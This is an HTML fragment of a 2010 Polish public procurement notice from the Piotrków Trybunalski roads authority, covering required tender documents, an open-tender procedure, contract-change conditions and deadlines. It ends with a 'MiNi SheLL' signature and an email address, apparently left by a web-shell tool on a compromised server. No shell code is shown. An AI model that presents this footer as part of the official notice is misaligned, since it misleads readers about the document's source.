<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1; 
2.Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza);
3.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu        o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy      w sprawie niniejszego zamówienia publicznego (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza);4. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego - wg załącznika nr 5; 5. Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 2;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia niniejszej umowy będą mogły zostać zmienione w stosunku do jej treści, jeżeli wystąpią następujące okoliczności :
1.Zmiana przepisów prawnych istotnych dla realizacji przedmiotu umowy 
2.Nastąpi konieczność zmiany terminu wykonania umowy z uwagi na wystąpienie warunków pogodowych nie pozwalających na terminowe wykonanie przedmiotu umowy lub wystąpienie innych okoliczności niezależnych od Wykonawcy, mających wpływ na termin realizacji umowy.
Zmiany te będą dopuszczalne wyłącznie w takim zakresie, w jakim ukończenie zamówienia jest, lub przewiduje się, że będzie, opóźnione na skutek tych działań.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdik.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI ZARZĄD DRÓG I KOMUNIKACJI UL. BELZACKA 176
97-300 PIOTRKÓW TRYBUNALSKI p.15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2010 godzina 07:30, miejsce: MIEJSKI ZARZĄD DRÓG I KOMUNIKACJI
PIOTRKÓW TRYBUNALSKI  kod: 97-300
UL. BELZACKA  176 POK. 2 (SEKRETARIAT).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com